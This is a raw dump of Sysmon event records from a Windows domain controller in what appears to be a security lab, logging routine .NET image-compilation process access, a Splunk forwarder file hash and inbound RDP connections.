14:58:37.529{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-8A0E-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.513{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-8A0E-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.513{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-8A0E-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000080339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.064{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-33559-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000080338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.604{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-32197-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000080337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.341{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-890E-00000000BB01}4812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.325{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-890E-00000000BB01}4812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.325{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-890E-00000000BB01}4812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.279{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C219CB699F7E9874F7D221DEFCA211A,SHA256=5D498EE8E2607D76CDBEBBF061E2860388DA6E13773CEAB1407B0B2B80175C98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.263{A7A01FEF-C0A6-607E-7705-00000000BB01}43486372C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.263{A7A01FEF-C0A6-607E-7705-00000000BB01}43486372C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000080331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.263{A7A01FEF-C0A6-607E-7705-00000000BB01}43483520C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+ae6fa|C:\Windows\System32\combase.dll+a54bd|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+64de3|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000080330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.200{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-880E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.185{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-880E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.185{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-880E-00000000BB01}1428C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.154{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-870E-00000000BB01}3896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.138{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-870E-00000000BB01}3896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.138{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-870E-00000000BB01}3896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.091{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-860E-00000000BB01}6080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.091{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-860E-00000000BB01}6080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.091{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-860E-00000000BB01}6080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.044{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-850E-00000000BB01}5572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.044{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-850E-00000000BB01}5572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.044{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-850E-00000000BB01}5572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 